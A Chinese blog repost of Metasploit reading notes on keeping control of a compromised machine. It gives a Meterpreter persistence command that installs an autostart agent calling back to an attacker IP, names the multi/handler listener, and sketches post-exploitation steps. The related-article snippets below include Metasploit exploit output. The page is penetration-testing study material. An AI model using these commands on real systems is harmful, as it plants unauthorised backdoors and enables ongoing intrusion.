Metasploit 读书笔记-持久控制

最新推荐文章于 2022-04-22 14:52:45 发布

weixin_30772105

最新推荐文章于 2022-04-22 14:52:45 发布

阅读量66

点赞数

原文链接：http://www.cnblogs.com/paktc/p/4055730.html

版权

Meterpreter的persisitence脚本允许主任meterpreter代理，以确保系统重启之后Meterpreter还能运行。如果是反弹连接方式，可以设置连接攻击机的时间间隔。如果是绑定方式，可以设置在指定时间按绑定开放端口。

举例：run persistence -X -i 50 -p 442 -r 192.168.33.129

此脚本让系统开机自启动(-X),50秒（-i 50）重连一次，使用的端口是443（-p 443）,连接的目的IP为192.168.33.129.

use multi/handler命令进行监听。

9.向后渗透攻击模块转变

列出所有后渗透攻击模块，可以这样输入然后在末尾按TAB键：

run post/

10.将命令行shell升级为Meterpreter

转载于:https://www.cnblogs.com/paktc/p/4055730.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30772105

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

web安全攻防笔记

m0_65369792的博客

04-07

500

1.SQLmap 是一种开源的渗透测试工具，可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。支持的数据库：MySQL，Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。（1）安装sqlmap前，需要先安装Python3.X Python Releases for Windows | Python.org ...

metasploit-4.17.1-2020080301-windows-x64-installer.exe

01-10

metasploit

参与评论您还未登录，请先登录后发表或查看评论

metasploit 学习笔记-VULNERABILITY SCANNING

weixin_30454481的博客

03-31

101

使用漏洞扫描器会在网络上产生大量流量，因此如果你不希望被发现踪迹时，不要使用漏洞扫描器。The Basic Vulnerability Scan漏洞扫描器的质量很大程度上取决于它自带的漏洞特征库。实用的漏洞扫描器：NeXpose、Nessus和一些专门的扫描器。（1）NeXpose可以使用独立版本的nexpose,也可以使用metasploit内置的nexpose。（2）Nessus（3）专用扫...

metasploit控制持久化

天元喜羊羊的博客

04-27

4671

msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.11:4444 [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.1.142 [*] Meterpre

Metasploit 读书笔记-神器Meterpreter

weixin_30907935的博客

04-02

一、基本命令截屏screenshot2.获取系统平台信息sysinfo3.进程信息ps4.获取键盘记录查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后--run post/windows/capture/keylog_recorder过一段时间CTRL+C中止。最后在另一个终端里，可以看到我们使用键盘记录所捕捉的内容。5.提取密码哈希use p...

Metasploit 读书笔记

老野的成长之路

11-05

1485

原文地址：读书笔记">Metasploit 读书笔记作者：macalzheng Metasploit 读书笔记 《metasploit The PenetrationTester's Guide》读书笔记v2 - 转自：http://www.t00ls.net/ ----BY chowner@t00ls 修订说明：v2版全面使用bt5 r1作为测试系统，对笔

《metasploit The PenetrationTester's Guide》读书笔记v2

aurora__的博客

04-26

691

转自吐司，原地址找不到了，希望作者看见能联系，给我个加上原博客地址的机会..笔芯❤️修订说明：v2版全面使用bt5 r1作为测试系统，对笔记中存在的众多错误和遗漏作了更正和补充；目录一．名词解释二．msf基础三．信息探测与收集四．基本漏洞扫描五．基础溢出命令六．METERPRETER七．避开杀软八．使用用户端攻击方式(client-side attacks)九．MSF 附加模块十．社会工程学工具集...

《内网安全攻防：渗透测试实战指南》读书笔记（八）：权限维持分析及防御

闵行小鱼塘

04-22

5385

本篇继续阅读学习《内网安全攻防：渗透测试实战指南》，本章是权限维持分析及防御，分析了常见的针对操作系统后门、Web后门及域后门（白银票据、黄金票据等）的攻击手段，并给出了相应的检测和防范方法

【读书笔记】《大型互联网企业安全架构（石祖文）》

热门推荐

weixin_44211968的博客

11-11

1万+

本文对《大型互联网企业安全架构》里的核心内容做了梳理，并加入了深层解释。很适合安全小白入门企业安全。

《质量全面管控》读书笔记——安全测试与安全管理

チンポー的博客

06-11

782

一、安全测试

metasploit-framework-master.zip

09-08

"metasploit-framework-master.zip" 是这个框架的源代码压缩包，包含了完整的开发环境和工具集合。 **Metasploit框架的核心组件** 1. **Payloads（有效载荷）**：有效载荷是攻击的核心部分，它们在目标系统上执行...

metasploitframework-win-x64

10-05

Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具，也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode，并且不断更新，使得缓冲区溢出测试变得方便和简单。使用...

metasploit-framework-6.3.34.zip

09-17

5. 后渗透操作：一旦成功入侵，Metasploit提供了后门模块，可以进行持久化控制，进行进一步的信息收集和横向移动。三、Metasploit的更新与维护 6.3.34版本的发布意味着开发者们持续在修复已知问题、增强稳定性和...

metasploit-framework-6.4.12.zip

06-23

- **工作流程**：Metasploit 遵循“侦查-扫描-漏洞利用-持久化-后渗透”等工作流程，覆盖了网络渗透测试的整个生命周期。 2. **6.4.12 版本新特性** - **性能提升**：新版本可能包含代码优化，提高框架运行速度和...

解除劳动合同五大热点问题及裁员概述.ppt

09-14

解除劳动合同五大热点问题及裁员概述.ppt

暴风TV 43X-45X-50X-55X、43B2-50B2-55B2升级程序

09-14

暴风TV 43X-45X-50X-55X、43B2-50B2-55B2升级程序暴风 Amlogic T866-H平台 1.0.42版本本地升级： 1、将本地升级软件包“update”拷贝至U盘里，插入电视USB端口，打开电视进入系统设置选择本地升级。 2、选择本地升级，遥控点击确认，主板检测到U盘里面的软件进行升级，如下图所示。 3、首先效验软件，若软件不对或者软件未完整下载会导致效验失败，效验成功后如下图所示。 4、升级过程中会擦除以前的数据烧录新的软件后重启系统，整个过程大约3-5分钟，切勿断电或拔掉U盘。升级完成后可以在系统设置——本机信息——查询软件版本更新状态注意： 1、U盘要求使用FAT32格式，建议4G-8G的品牌U盘，刷机成功率会高 2、升级到结束，大约需要8-30分钟，中途绝对不能断电 3、升级重启第一次进入系统，请等完全正常进入开机桌面之后，才能拨下U盘

基于Springboot和Mysql的中小企业设备管理系统代码，包括程序，中文注释，配置说明操作步骤

09-14

暴风电视刷机数据 43X-45X-50X-55X、43B2-50B2-55B2升级程序 1.045版本